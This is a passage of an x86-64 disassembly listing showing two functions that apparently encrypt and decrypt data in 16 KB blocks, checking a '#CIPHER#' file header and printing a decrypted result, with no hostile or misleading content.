ff ff callq 400da0 508 | 401372: 48 8d b4 24 10 01 00 lea 0x110(%rsp),%rsi 509 | 401379: 00 510 | 40137a: 48 89 df mov %rbx,%rdi 511 | 40137d: e8 ce fc ff ff callq 401050 512 | 401382: 31 db xor %ebx,%ebx 513 | 401384: 85 c0 test %eax,%eax 514 | 401386: 41 bd ff ff ff ff mov $0xffffffff,%r13d 515 | 40138c: 0f 85 cf 02 00 00 jne 401661 516 | 401392: c7 44 24 24 80 01 00 movl $0x180,0x24(%rsp) 517 | 401399: 00 518 | 40139a: bf 80 01 00 00 mov $0x180,%edi 519 | 40139f: e8 1c fa ff ff callq 400dc0 520 | 4013a4: 48 89 c3 mov %rax,%rbx 521 | 4013a7: 45 31 ff xor %r15d,%r15d 522 | 4013aa: 48 85 db test %rbx,%rbx 523 | 4013ad: 0f 84 84 03 00 00 je 401737 524 | 4013b3: bf 00 40 00 00 mov $0x4000,%edi 525 | 4013b8: e8 03 fa ff ff callq 400dc0 526 | 4013bd: 49 89 c7 mov %rax,%r15 527 | 4013c0: 4d 85 ff test %r15,%r15 528 | 4013c3: 0f 84 98 02 00 00 je 401661 529 | 4013c9: be 41 02 00 00 mov $0x241,%esi 530 | 4013ce: 31 c0 xor %eax,%eax 531 | 4013d0: 4c 89 f7 mov %r14,%rdi 532 | 4013d3: e8 68 fb ff ff callq 400f40 533 | 4013d8: 41 89 c4 mov %eax,%r12d 534 | 4013db: 45 85 e4 test %r12d,%r12d 535 | 4013de: 0f 88 86 02 00 00 js 40166a 536 | 4013e4: be 49 1f 40 00 mov $0x401f49,%esi 537 | 4013e9: ba 08 00 00 00 mov $0x8,%edx 538 | 4013ee: 44 89 e7 mov %r12d,%edi 539 | 4013f1: e8 3a fb ff ff callq 400f30 540 | 4013f6: 48 83 f8 08 cmp $0x8,%rax 541 | 4013fa: 0f 85 6a 02 00 00 jne 40166a 542 | 401400: 48 8d bc 24 10 01 00 lea 0x110(%rsp),%rdi 543 | 401407: 00 544 | 401408: 48 8d b4 24 60 01 00 lea 0x160(%rsp),%rsi 545 | 40140f: 00 546 | 401410: 48 8d 94 24 50 01 00 lea 0x150(%rsp),%rdx 547 | 401417: 00 548 | 401418: 48 8d 8c 24 30 01 00 lea 0x130(%rsp),%rcx 549 | 40141f: 00 550 | 401420: e8 0b fd ff ff callq 401130 551 | 401425: 85 c0 test %eax,%eax 552 | 401427: 0f 85 3d 02 00 00 jne 40166a 553 | 40142d: 48 8d b4 24 30 01 00 lea 0x130(%rsp),%rsi 554 | 401434: 00 555 | 401435: ba 08 00 00 00 mov $0x8,%edx 556 | 40143a: 44 89 e7 mov %r12d,%edi 557 | 40143d: e8 ee fa ff ff callq 400f30 
558 | 401442: 48 83 f8 08 cmp $0x8,%rax 559 | 401446: 0f 85 1e 02 00 00 jne 40166a 560 | 40144c: 48 8b 84 24 1f 01 00 mov 0x11f(%rsp),%rax 561 | 401453: 00 562 | 401454: 48 89 84 24 8f 01 00 mov %rax,0x18f(%rsp) 563 | 40145b: 00 564 | 40145c: 0f 28 84 24 10 01 00 movaps 0x110(%rsp),%xmm0 565 | 401463: 00 566 | 401464: 0f 29 84 24 80 01 00 movaps %xmm0,0x180(%rsp) 567 | 40146b: 00 568 | 40146c: 48 8b 84 24 30 01 00 mov 0x130(%rsp),%rax 569 | 401473: 00 570 | 401474: 48 89 84 24 97 01 00 mov %rax,0x197(%rsp) 571 | 40147b: 00 572 | 40147c: 48 8d bc 24 80 01 00 lea 0x180(%rsp),%rdi 573 | 401483: 00 574 | 401484: 48 8d 94 24 d0 00 00 lea 0xd0(%rsp),%rdx 575 | 40148b: 00 576 | 40148c: be 1f 00 00 00 mov $0x1f,%esi 577 | 401491: e8 da f9 ff ff callq 400e70 578 | 401496: ba 40 00 00 00 mov $0x40,%edx 579 | 40149b: 44 89 e7 mov %r12d,%edi 580 | 40149e: 48 8d b4 24 d0 00 00 lea 0xd0(%rsp),%rsi 581 | 4014a5: 00 582 | 4014a6: e8 85 fa ff ff callq 400f30 583 | 4014ab: 48 83 f8 40 cmp $0x40,%rax 584 | 4014af: 0f 85 b5 01 00 00 jne 40166a 585 | 4014b5: e8 46 fa ff ff callq 400f00 586 | 4014ba: 48 8d 7c 24 28 lea 0x28(%rsp),%rdi 587 | 4014bf: 48 8d 8c 24 60 01 00 lea 0x160(%rsp),%rcx 588 | 4014c6: 00 589 | 4014c7: 4c 8d 84 24 50 01 00 lea 0x150(%rsp),%r8 590 | 4014ce: 00 591 | 4014cf: 31 d2 xor %edx,%edx 592 | 4014d1: 48 89 c6 mov %rax,%rsi 593 | 4014d4: e8 47 fa ff ff callq 400f20 594 | 4014d9: 85 c0 test %eax,%eax 595 | 4014db: 0f 84 89 01 00 00 je 40166a 596 | 4014e1: 48 8d 7c 24 28 lea 0x28(%rsp),%rdi 597 | 4014e6: 48 8d 54 24 24 lea 0x24(%rsp),%rdx 598 | 4014eb: 41 b8 70 01 00 00 mov $0x170,%r8d 599 | 4014f1: 48 89 de mov %rbx,%rsi 600 | 4014f4: 48 89 e9 mov %rbp,%rcx 601 | 4014f7: e8 84 f9 ff ff callq 400e80 602 | 4014fc: 85 c0 test %eax,%eax 603 | 4014fe: 0f 84 66 01 00 00 je 40166a 604 | 401504: 48 63 74 24 24 movslq 0x24(%rsp),%rsi 605 | 401509: 48 01 de add %rbx,%rsi 606 | 40150c: 48 8d 7c 24 28 lea 0x28(%rsp),%rdi 607 | 401511: 48 8d 54 24 20 lea 0x20(%rsp),%rdx 608 | 
401516: e8 35 f9 ff ff callq 400e50 609 | 40151b: 85 c0 test %eax,%eax 610 | 40151d: 0f 84 47 01 00 00 je 40166a 611 | 401523: 8b 44 24 24 mov 0x24(%rsp),%eax 612 | 401527: 03 44 24 20 add 0x20(%rsp),%eax 613 | 40152b: 3d 70 01 00 00 cmp $0x170,%eax 614 | 401530: 89 44 24 24 mov %eax,0x24(%rsp) 615 | 401534: 0f 85 30 01 00 00 jne 40166a 616 | 40153a: bf 28 1f 40 00 mov $0x401f28,%edi 617 | 40153f: 31 f6 xor %esi,%esi 618 | 401541: 31 c0 xor %eax,%eax 619 | 401543: e8 f8 f9 ff ff callq 400f40 620 | 401548: 89 44 24 1c mov %eax,0x1c(%rsp) 621 | 40154c: 85 c0 test %eax,%eax 622 | 40154e: 0f 88 16 01 00 00 js 40166a 623 | 401554: c7 44 24 20 00 00 00 movl $0x0,0x20(%rsp) 624 | 40155b: 00 625 | 40155c: 31 c0 xor %eax,%eax 626 | 40155e: 31 c9 xor %ecx,%ecx 627 | 401560: 41 bd ff ff ff ff mov $0xffffffff,%r13d 628 | 401566: 48 89 04 24 mov %rax,(%rsp) 629 | 40156a: 0f b6 84 04 10 01 00 movzbl 0x110(%rsp,%rax,1),%eax 630 | 401571: 00 631 | 401572: 89 44 24 18 mov %eax,0x18(%rsp) 632 | 401576: 83 c0 bf add $0xffffffbf,%eax 633 | 401579: 89 44 24 14 mov %eax,0x14(%rsp) 634 | 40157d: 78 74 js 4015f3 635 | 40157f: 48 8b 04 24 mov (%rsp),%rax 636 | 401583: 48 c1 e0 04 shl $0x4,%rax 637 | 401587: 48 01 d8 add %rbx,%rax 638 | 40158a: 48 89 44 24 08 mov %rax,0x8(%rsp) 639 | 40158f: bd 41 00 00 00 mov $0x41,%ebp 640 | 401594: ba 00 40 00 00 mov $0x4000,%edx 641 | 401599: 8b 7c 24 1c mov 0x1c(%rsp),%edi 642 | 40159d: 4c 89 fe mov %r15,%rsi 643 | 4015a0: e8 0b f8 ff ff callq 400db0 644 | 4015a5: 48 3d 00 40 00 00 cmp $0x4000,%rax 645 | 4015ab: 0f 85 a5 00 00 00 jne 401656 646 | 4015b1: 39 6c 24 18 cmp %ebp,0x18(%rsp) 647 | 4015b5: 75 0c jne 4015c3 648 | 4015b7: 48 8b 44 24 08 mov 0x8(%rsp),%rax 649 | 4015bc: 0f 10 00 movups (%rax),%xmm0 650 | 4015bf: 41 0f 11 07 movups %xmm0,(%r15) 651 | 4015c3: ba 00 40 00 00 mov $0x4000,%edx 652 | 4015c8: 44 89 e7 mov %r12d,%edi 653 | 4015cb: 4c 89 fe mov %r15,%rsi 654 | 4015ce: e8 5d f9 ff ff callq 400f30 655 | 4015d3: 48 3d 00 40 00 00 cmp 
$0x4000,%rax 656 | 4015d9: 75 7b jne 401656 657 | 4015db: 8b 4c 24 20 mov 0x20(%rsp),%ecx 658 | 4015df: ff c1 inc %ecx 659 | 4015e1: 89 4c 24 20 mov %ecx,0x20(%rsp) 660 | 4015e5: 8d 45 01 lea 0x1(%rbp),%eax 661 | 4015e8: 83 c5 bf add $0xffffffbf,%ebp 662 | 4015eb: 3b 6c 24 14 cmp 0x14(%rsp),%ebp 663 | 4015ef: 89 c5 mov %eax,%ebp 664 | 4015f1: 7c a1 jl 401594 665 | 4015f3: 48 8b 04 24 mov (%rsp),%rax 666 | 4015f7: 48 ff c0 inc %rax 667 | 4015fa: 83 f8 17 cmp $0x17,%eax 668 | 4015fd: 0f 8c 63 ff ff ff jl 401566 669 | 401603: 81 f9 55 02 00 00 cmp $0x255,%ecx 670 | 401609: 7f 48 jg 401653 671 | 40160b: 41 bd ff ff ff ff mov $0xffffffff,%r13d 672 | 401611: ba 00 40 00 00 mov $0x4000,%edx 673 | 401616: 8b 7c 24 1c mov 0x1c(%rsp),%edi 674 | 40161a: 4c 89 fe mov %r15,%rsi 675 | 40161d: e8 8e f7 ff ff callq 400db0 676 | 401622: 48 3d 00 40 00 00 cmp $0x4000,%rax 677 | 401628: 75 2c jne 401656 678 | 40162a: ba 00 40 00 00 mov $0x4000,%edx 679 | 40162f: 44 89 e7 mov %r12d,%edi 680 | 401632: 4c 89 fe mov %r15,%rsi 681 | 401635: e8 f6 f8 ff ff callq 400f30 682 | 40163a: 48 3d 00 40 00 00 cmp $0x4000,%rax 683 | 401640: 75 14 jne 401656 684 | 401642: 8b 44 24 20 mov 0x20(%rsp),%eax 685 | 401646: ff c0 inc %eax 686 | 401648: 3d 56 02 00 00 cmp $0x256,%eax 687 | 40164d: 89 44 24 20 mov %eax,0x20(%rsp) 688 | 401651: 7c be jl 401611 689 | 401653: 45 31 ed xor %r13d,%r13d 690 | 401656: 8b 7c 24 1c mov 0x1c(%rsp),%edi 691 | 40165a: e8 f1 f6 ff ff callq 400d50 692 | 40165f: eb 09 jmp 40166a 693 | 401661: 45 31 ff xor %r15d,%r15d 694 | 401664: 41 bc ff ff ff ff mov $0xffffffff,%r12d 695 | 40166a: 0f 57 c0 xorps %xmm0,%xmm0 696 | 40166d: 0f 29 84 24 70 01 00 movaps %xmm0,0x170(%rsp) 697 | 401674: 00 698 | 401675: 0f 29 84 24 60 01 00 movaps %xmm0,0x160(%rsp) 699 | 40167c: 00 700 | 40167d: 0f 29 84 24 50 01 00 movaps %xmm0,0x150(%rsp) 701 | 401684: 00 702 | 401685: 0f 29 84 24 40 01 00 movaps %xmm0,0x140(%rsp) 703 | 40168c: 00 704 | 40168d: 0f 29 84 24 30 01 00 movaps %xmm0,0x130(%rsp) 
705 | 401694: 00 706 | 401695: 0f 29 84 24 20 01 00 movaps %xmm0,0x120(%rsp) 707 | 40169c: 00 708 | 40169d: 0f 29 84 24 10 01 00 movaps %xmm0,0x110(%rsp) 709 | 4016a4: 00 710 | 4016a5: 0f 29 84 24 00 01 00 movaps %xmm0,0x100(%rsp) 711 | 4016ac: 00 712 | 4016ad: 0f 29 84 24 f0 00 00 movaps %xmm0,0xf0(%rsp) 713 | 4016b4: 00 714 | 4016b5: 0f 29 84 24 e0 00 00 movaps %xmm0,0xe0(%rsp) 715 | 4016bc: 00 716 | 4016bd: 0f 29 84 24 d0 00 00 movaps %xmm0,0xd0(%rsp) 717 | 4016c4: 00 718 | 4016c5: 48 85 db test %rbx,%rbx 719 | 4016c8: 74 08 je 4016d2 720 | 4016ca: 48 89 df mov %rbx,%rdi 721 | 4016cd: e8 3e f7 ff ff callq 400e10 722 | 4016d2: 4d 85 ff test %r15,%r15 723 | 4016d5: 74 08 je 4016df 724 | 4016d7: 4c 89 ff mov %r15,%rdi 725 | 4016da: e8 31 f7 ff ff callq 400e10 726 | 4016df: 48 8d 7c 24 28 lea 0x28(%rsp),%rdi 727 | 4016e4: e8 f7 f7 ff ff callq 400ee0 728 | 4016e9: 45 85 e4 test %r12d,%r12d 729 | 4016ec: 78 08 js 4016f6 730 | 4016ee: 44 89 e7 mov %r12d,%edi 731 | 4016f1: e8 5a f6 ff ff callq 400d50 732 | 4016f6: 31 c0 xor %eax,%eax 733 | 4016f8: 45 85 ed test %r13d,%r13d 734 | 4016fb: 74 15 je 401712 735 | 4016fd: 4c 89 f7 mov %r14,%rdi 736 | 401700: e8 db f6 ff ff callq 400de0 737 | 401705: bf f4 1e 40 00 mov $0x401ef4,%edi 738 | 40170a: e8 61 f6 ff ff callq 400d70 739 | 40170f: 44 89 e8 mov %r13d,%eax 740 | 401712: 64 48 8b 0c 25 28 00 mov %fs:0x28,%rcx 741 | 401719: 00 00 742 | 40171b: 48 3b 8c 24 b0 01 00 cmp 0x1b0(%rsp),%rcx 743 | 401722: 00 744 | 401723: 75 1f jne 401744 745 | 401725: 48 81 c4 b8 01 00 00 add $0x1b8,%rsp 746 | 40172c: 5b pop %rbx 747 | 40172d: 41 5c pop %r12 748 | 40172f: 41 5d pop %r13 749 | 401731: 41 5e pop %r14 750 | 401733: 41 5f pop %r15 751 | 401735: 5d pop %rbp 752 | 401736: c3 retq 753 | 401737: 31 db xor %ebx,%ebx 754 | 401739: 41 bc ff ff ff ff mov $0xffffffff,%r12d 755 | 40173f: e9 26 ff ff ff jmpq 40166a 756 | 401744: e8 57 f7 ff ff callq 400ea0 <__stack_chk_fail@plt> 757 | 401749: 0f 1f 80 00 00 00 00 nopl 0x0(%rax) 758 | 401750: 
55 push %rbp 759 | 401751: 41 57 push %r15 760 | 401753: 41 56 push %r14 761 | 401755: 41 55 push %r13 762 | 401757: 41 54 push %r12 763 | 401759: 53 push %rbx 764 | 40175a: 48 81 ec a8 02 00 00 sub $0x2a8,%rsp 765 | 401761: 48 89 f5 mov %rsi,%rbp 766 | 401764: 48 89 fb mov %rdi,%rbx 767 | 401767: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax 768 | 40176e: 00 00 769 | 401770: 48 89 84 24 a0 02 00 mov %rax,0x2a0(%rsp) 770 | 401777: 00 771 | 401778: 48 8d 54 24 20 lea 0x20(%rsp),%rdx 772 | 40177d: bf 01 00 00 00 mov $0x1,%edi 773 | 401782: e8 a9 f6 ff ff callq 400e30 <__xstat@plt> 774 | 401787: 85 c0 test %eax,%eax 775 | 401789: 0f 85 16 03 00 00 jne 401aa5 776 | 40178f: 48 81 7c 24 50 50 80 cmpq $0x958050,0x50(%rsp) 777 | 401796: 95 00 778 | 401798: 0f 85 07 03 00 00 jne 401aa5 779 | 40179e: 48 8d bc 24 b8 00 00 lea 0xb8(%rsp),%rdi 780 | 4017a5: 00 781 | 4017a6: e8 f5 f5 ff ff callq 400da0 782 | 4017ab: 48 8d b4 24 e0 01 00 lea 0x1e0(%rsp),%rsi 783 | 4017b2: 00 784 | 4017b3: 48 89 df mov %rbx,%rdi 785 | 4017b6: e8 95 f8 ff ff callq 401050 786 | 4017bb: 31 db xor %ebx,%ebx 787 | 4017bd: 85 c0 test %eax,%eax 788 | 4017bf: 41 bc ff ff ff ff mov $0xffffffff,%r12d 789 | 4017c5: 0f 85 12 03 00 00 jne 401add 790 | 4017cb: bf 00 02 00 00 mov $0x200,%edi 791 | 4017d0: e8 eb f5 ff ff callq 400dc0 792 | 4017d5: 48 89 c3 mov %rax,%rbx 793 | 4017d8: 45 31 f6 xor %r14d,%r14d 794 | 4017db: 48 85 db test %rbx,%rbx 795 | 4017de: 0f 84 c6 03 00 00 je 401baa 796 | 4017e4: bf 00 02 00 00 mov $0x200,%edi 797 | 4017e9: e8 d2 f5 ff ff callq 400dc0 798 | 4017ee: 49 89 c6 mov %rax,%r14 799 | 4017f1: 4d 85 f6 test %r14,%r14 800 | 4017f4: 0f 84 e3 02 00 00 je 401add 801 | 4017fa: 31 f6 xor %esi,%esi 802 | 4017fc: 31 c0 xor %eax,%eax 803 | 4017fe: 48 89 ef mov %rbp,%rdi 804 | 401801: e8 3a f7 ff ff callq 400f40 805 | 401806: 89 c5 mov %eax,%ebp 806 | 401808: 85 ed test %ebp,%ebp 807 | 40180a: 0f 88 d5 02 00 00 js 401ae5 808 | 401810: 48 8d b4 24 50 02 00 lea 0x250(%rsp),%rsi 809 | 401817: 00 810 | 
401818: ba 08 00 00 00 mov $0x8,%edx 811 | 40181d: 89 ef mov %ebp,%edi 812 | 40181f: e8 8c f5 ff ff callq 400db0 813 | 401824: 48 83 f8 08 cmp $0x8,%rax 814 | 401828: 0f 85 b7 02 00 00 jne 401ae5 815 | 40182e: 48 b8 23 43 49 50 48 movabs $0x2352454850494323,%rax 816 | 401835: 45 52 23 817 | 401838: 48 39 84 24 50 02 00 cmp %rax,0x250(%rsp) 818 | 40183f: 00 819 | 401840: 0f 85 9f 02 00 00 jne 401ae5 820 | 401846: 48 8d b4 24 00 02 00 lea 0x200(%rsp),%rsi 821 | 40184d: 00 822 | 40184e: ba 08 00 00 00 mov $0x8,%edx 823 | 401853: 89 ef mov %ebp,%edi 824 | 401855: e8 56 f5 ff ff callq 400db0 825 | 40185a: 48 83 f8 08 cmp $0x8,%rax 826 | 40185e: 0f 85 81 02 00 00 jne 401ae5 827 | 401864: e8 97 f6 ff ff callq 400f00 828 | 401869: 49 89 c7 mov %rax,%r15 829 | 40186c: e8 9f f6 ff ff callq 400f10 830 | 401871: 48 8d 8c 24 20 02 00 lea 0x220(%rsp),%rcx 831 | 401878: 00 832 | 401879: 48 89 4c 24 08 mov %rcx,0x8(%rsp) 833 | 40187e: 48 8d 8c 24 30 02 00 lea 0x230(%rsp),%rcx 834 | 401885: 00 835 | 401886: 48 89 0c 24 mov %rcx,(%rsp) 836 | 40188a: 48 8d 94 24 00 02 00 lea 0x200(%rsp),%rdx 837 | 401891: 00 838 | 401892: 48 8d 8c 24 e0 01 00 lea 0x1e0(%rsp),%rcx 839 | 401899: 00 840 | 40189a: 41 b8 17 00 00 00 mov $0x17,%r8d 841 | 4018a0: 41 b9 07 00 00 00 mov $0x7,%r9d 842 | 4018a6: 4c 89 ff mov %r15,%rdi 843 | 4018a9: 48 89 c6 mov %rax,%rsi 844 | 4018ac: e8 df f4 ff ff callq 400d90 845 | 4018b1: 83 f8 20 cmp $0x20,%eax 846 | 4018b4: 0f 85 fc 02 00 00 jne 401bb6 847 | 4018ba: 48 8b 84 24 ef 01 00 mov 0x1ef(%rsp),%rax 848 | 4018c1: 00 849 | 4018c2: 48 89 84 24 7f 02 00 mov %rax,0x27f(%rsp) 850 | 4018c9: 00 851 | 4018ca: 0f 28 84 24 e0 01 00 movaps 0x1e0(%rsp),%xmm0 852 | 4018d1: 00 853 | 4018d2: 0f 29 84 24 70 02 00 movaps %xmm0,0x270(%rsp) 854 | 4018d9: 00 855 | 4018da: 48 8b 84 24 00 02 00 mov 0x200(%rsp),%rax 856 | 4018e1: 00 857 | 4018e2: 48 89 84 24 87 02 00 mov %rax,0x287(%rsp) 858 | 4018e9: 00 859 | 4018ea: 48 8d bc 24 70 02 00 lea 0x270(%rsp),%rdi 860 | 4018f1: 00 861 | 
4018f2: 48 8d 94 24 a0 01 00 lea 0x1a0(%rsp),%rdx 862 | 4018f9: 00 863 | 4018fa: be 1f 00 00 00 mov $0x1f,%esi 864 | 4018ff: e8 6c f5 ff ff callq 400e70 865 | 401904: 48 8d b4 24 60 01 00 lea 0x160(%rsp),%rsi 866 | 40190b: 00 867 | 40190c: ba 40 00 00 00 mov $0x40,%edx 868 | 401911: 89 ef mov %ebp,%edi 869 | 401913: e8 98 f4 ff ff callq 400db0 870 | 401918: 48 83 f8 40 cmp $0x40,%rax 871 | 40191c: 0f 85 c3 01 00 00 jne 401ae5 872 | 401922: 48 8d bc 24 a0 01 00 lea 0x1a0(%rsp),%rdi 873 | 401929: 00 874 | 40192a: 48 8d b4 24 60 01 00 lea 0x160(%rsp),%rsi 875 | 401931: 00 876 | 401932: ba 40 00 00 00 mov $0x40,%edx 877 | 401937: e8 94 f5 ff ff callq 400ed0 878 | 40193c: 85 c0 test %eax,%eax 879 | 40193e: 0f 85 a1 01 00 00 jne 401ae5 880 | 401944: c7 84 24 b4 00 00 00 movl $0x0,0xb4(%rsp) 881 | 40194b: 00 00 00 00 882 | 40194f: 45 31 ed xor %r13d,%r13d 883 | 401952: 48 89 de mov %rbx,%rsi 884 | 401955: 45 31 ff xor %r15d,%r15d 885 | 401958: 48 89 74 24 10 mov %rsi,0x10(%rsp) 886 | 40195d: 42 0f b6 84 3c e0 01 movzbl 0x1e0(%rsp,%r15,1),%eax 887 | 401964: 00 00 888 | 401966: 46 8d 6c 28 bf lea -0x41(%rax,%r13,1),%r13d 889 | 40196b: 44 89 ac 24 b4 00 00 mov %r13d,0xb4(%rsp) 890 | 401972: 00 891 | 401973: 44 89 e8 mov %r13d,%eax 892 | 401976: c1 e0 0e shl $0xe,%eax 893 | 401979: 83 c8 50 or $0x50,%eax 894 | 40197c: 48 63 c8 movslq %eax,%rcx 895 | 40197f: ba 10 00 00 00 mov $0x10,%edx 896 | 401984: 89 ef mov %ebp,%edi 897 | 401986: e8 d5 f4 ff ff callq 400e60 898 | 40198b: 48 83 f8 10 cmp $0x10,%rax 899 | 40198f: 0f 85 50 01 00 00 jne 401ae5 900 | 401995: 41 ff c5 inc %r13d 901 | 401998: 44 89 ac 24 b4 00 00 mov %r13d,0xb4(%rsp) 902 | 40199f: 00 903 | 4019a0: 49 ff c7 inc %r15 904 | 4019a3: 48 8b 74 24 10 mov 0x10(%rsp),%rsi 905 | 4019a8: 48 83 c6 10 add $0x10,%rsi 906 | 4019ac: 41 83 ff 17 cmp $0x17,%r15d 907 | 4019b0: 7c a6 jl 401958 908 | 4019b2: e8 49 f5 ff ff callq 400f00 909 | 4019b7: 48 8d 8c 24 b8 00 00 lea 0xb8(%rsp),%rcx 910 | 4019be: 00 911 | 4019bf: 4c 8d 84 24 
30 02 00 lea 0x230(%rsp),%r8 912 | 4019c6: 00 913 | 4019c7: 4c 8d 8c 24 20 02 00 lea 0x220(%rsp),%r9 914 | 4019ce: 00 915 | 4019cf: 31 d2 xor %edx,%edx 916 | 4019d1: 48 89 cf mov %rcx,%rdi 917 | 4019d4: 48 89 c6 mov %rax,%rsi 918 | 4019d7: 4c 89 c1 mov %r8,%rcx 919 | 4019da: 4d 89 c8 mov %r9,%r8 920 | 4019dd: e8 5e f4 ff ff callq 400e40 921 | 4019e2: 85 c0 test %eax,%eax 922 | 4019e4: 0f 84 fb 00 00 00 je 401ae5 923 | 4019ea: 48 8d 84 24 b8 00 00 lea 0xb8(%rsp),%rax 924 | 4019f1: 00 925 | 4019f2: 48 8d 4c 24 1c lea 0x1c(%rsp),%rcx 926 | 4019f7: 41 b8 70 01 00 00 mov $0x170,%r8d 927 | 4019fd: 48 89 c7 mov %rax,%rdi 928 | 401a00: 4c 89 f6 mov %r14,%rsi 929 | 401a03: 48 89 ca mov %rcx,%rdx 930 | 401a06: 48 89 d9 mov %rbx,%rcx 931 | 401a09: e8 e2 f4 ff ff callq 400ef0 932 | 401a0e: 85 c0 test %eax,%eax 933 | 401a10: 0f 84 cf 00 00 00 je 401ae5 934 | 401a16: 48 63 44 24 1c movslq 0x1c(%rsp),%rax 935 | 401a1b: 4c 01 f0 add %r14,%rax 936 | 401a1e: 48 8d 8c 24 b8 00 00 lea 0xb8(%rsp),%rcx 937 | 401a25: 00 938 | 401a26: 48 8d 94 24 b4 00 00 lea 0xb4(%rsp),%rdx 939 | 401a2d: 00 940 | 401a2e: 48 89 cf mov %rcx,%rdi 941 | 401a31: 48 89 c6 mov %rax,%rsi 942 | 401a34: e8 77 f4 ff ff callq 400eb0 943 | 401a39: 85 c0 test %eax,%eax 944 | 401a3b: 0f 84 a4 00 00 00 je 401ae5 945 | 401a41: 8b 44 24 1c mov 0x1c(%rsp),%eax 946 | 401a45: 03 84 24 b4 00 00 00 add 0xb4(%rsp),%eax 947 | 401a4c: 3d 70 01 00 00 cmp $0x170,%eax 948 | 401a51: 89 44 24 1c mov %eax,0x1c(%rsp) 949 | 401a55: 0f 85 8a 00 00 00 jne 401ae5 950 | 401a5b: 48 8b 05 ee 16 20 00 mov 0x2016ee(%rip),%rax # 603150 951 | 401a62: 48 89 c7 mov %rax,%rdi 952 | 401a65: e8 e6 f4 ff ff callq 400f50 953 | 401a6a: 45 31 ff xor %r15d,%r15d 954 | 401a6d: 43 80 3c 3e 00 cmpb $0x0,(%r14,%r15,1) 955 | 401a72: 74 22 je 401a96 956 | 401a74: 4b 8d 04 3e lea (%r14,%r15,1),%rax 957 | 401a78: bf 01 00 00 00 mov $0x1,%edi 958 | 401a7d: ba 01 00 00 00 mov $0x1,%edx 959 | 401a82: 48 89 c6 mov %rax,%rsi 960 | 401a85: e8 a6 f4 ff ff callq 400f30 961 
| 401a8a: 49 ff c7 inc %r15 962 | 401a8d: 41 81 ff 70 01 00 00 cmp $0x170,%r15d 963 | 401a94: 7c d7 jl 401a6d 964 | 401a96: bf 0a 00 00 00 mov $0xa,%edi 965 | 401a9b: e8 e0 f2 ff ff callq 400d80 966 | 401aa0: 45 31 e4 xor %r12d,%r12d 967 | 401aa3: eb 40 jmp 401ae5 968 | 401aa5: bf f4 1e 40 00 mov $0x401ef4,%edi 969 | 401aaa: e8 c1 f2 ff ff callq 400d70 970 | 401aaf: b8 ff ff ff ff mov $0xffffffff,%eax 971 | 401ab4: 64 48 8b 0c 25 28 00 mov %fs:0x28,%rcx 972 | 401abb: 00 00 973 | 401abd: 48 3b 8c 24 a0 02 00 cmp 0x2a0(%rsp),%rcx 974 | 401ac4: 00 975 | 401ac5: 0f 85 fa 00 00 00 jne 401bc5 976 | 401acb: 48 81 c4 a8 02 00 00 add $0x2a8,%rsp 977 | 401ad2: 5b pop %rbx 978 | 401ad3: 41 5c pop %r12 979 | 401ad5: 41 5d pop %r13 980 | 401ad7: 41 5e pop %r14 981 | 401ad9: 41 5f pop %r15 982 | 401adb: 5d pop %rbp 983 | 401adc: c3 retq 984 | 401add: bd ff ff ff ff mov $0xffffffff,%ebp 985 | 401ae2: 45 31 f6 xor %r14d,%r14d 986 | 401ae5: 0f 57 c0 xorps %xmm0,%xmm0 987 | 401ae8: 0f 29 84 24 40 02 00 movaps %xmm0,0x240(%rsp) 988 | 401aef: 00 989 | 401af0: 0f 29 84 24 30 02 00 movaps %xmm0,0x230(%rsp) 990 | 401af7: 00 991 | 401af8: 0f 29 84 24 20 02 00 movaps %xmm0,0x220(%rsp) 992 | 401aff: 00 993 | 401b00: 0f 29 84 24 10 02 00 movaps %xmm0,0x210(%rsp) 994 | 401b07: 00 995 | 401b08: 0f 29 84 24 00 02 00 movaps %xmm0,0x200(%rsp) 996 | 401b0f: 00 997 | 401b10: 0f 29 84 24 f0 01 00 movaps %xmm0,0x1f0(%rsp) 998 | 401b17: 00 999 | 401b18: 0f 29 84 24 e0 01 00 movaps %xmm0,0x1e0(%rsp) 1000 | 401b1f: 00 1001 | 401b20: 0f 29 84 24 d0 01 00 movaps %xmm0,0x1d0(%rsp) 1002 | 401b27: 00 1003 | 401b28: 0f 29 84 24 c0 01 00 movaps %xmm0,0x1c0(%rsp) 1004 | 401b2f: 00 1005 | 401b30: 0f 29 84 24 b0 01 00 movaps %xmm0,0x1b0(%rsp) 1006 | 401b37: 00 1007 | 401b38: 0f 29 84 24 a0 01 00 movaps %xmm0,0x1a0(%rsp) 1008 | 401b3f: 00 1009 | 401b40: 0f 29 84 24 90 01 00 movaps %xmm0,0x190(%rsp) 1010 | 401b47: 00 1011 | 401b48: 0f 29 84 24 80 01 00 movaps %xmm0,0x180(%rsp) 1012 | 401b4f: 00 1013 | 401b50: 0f 29 
84 24 70 01 00 movaps %xmm0,0x170(%rsp) 1014 | 401b57: 00 1015 | 401b58: 0f 29 84 24 60 01 00 movaps %xmm0,0x160(%rsp) 1016 | 401b5f: 00 1017 | 401b60: 48 85 db test %rbx,%rbx 1018 | 401b63: 74 10 je 401b75 1019 | 401b65: 48 89 df mov %rbx,%rdi 1020 | 401b68: e8 a3 f2 ff ff callq 400e10 1021 | 401b6d: 4c 89 f7 mov %r14,%rdi 1022 | 401b70: e8 9b f2 ff ff callq 400e10 1023 | 401b75: 48 8d bc 24 b8 00 00 lea 0xb8(%rsp),%rdi 1024 | 401b7c: 00 1025 | 401b7d: e8 5e f3 ff ff callq 400ee0 1026 | 401b82: 85 ed test %ebp,%ebp 1027 | 401b84: 78 07 js 401b8d 1028 | 401b86: 89 ef mov %ebp,%edi 1029 | 401b88: e8 c3 f1 ff ff callq 400d50 1030 | 401b8d: 31 c0 xor %eax,%eax 1031 | 401b8f: 45 85 e4 test %r12d,%r12d 1032 | 401b92: 0f 84 1c ff ff ff je 401ab4 1033 | 401b98: bf f4 1e 40 00 mov $0x401ef4,%edi 1034 | 401b9d: e8 ce f1 ff ff callq 400d70 1035 | 401ba2: 44 89 e0 mov %r12d,%eax 1036 | 401ba5: e9 0a ff ff ff jmpq 401ab4 1037 | 401baa: bd ff ff ff ff mov $0xffffffff,%ebp 1038 | 401baf: 31 db xor %ebx,%ebx 1039 | 401bb1: e9 2f ff ff ff jmpq 401ae5 1040 | 401bb6: bf f4 1e 40 00 mov $0x401ef4,%edi 1041 | 401bbb: e8 b0 f1 ff ff callq 400d70 1042 | 401bc0: e9 20 ff ff ff jmpq 401ae5 1043 | 401bc5: e8 d6 f2 ff ff callq 400ea0 <__stack_chk_fail@plt> 1044 | 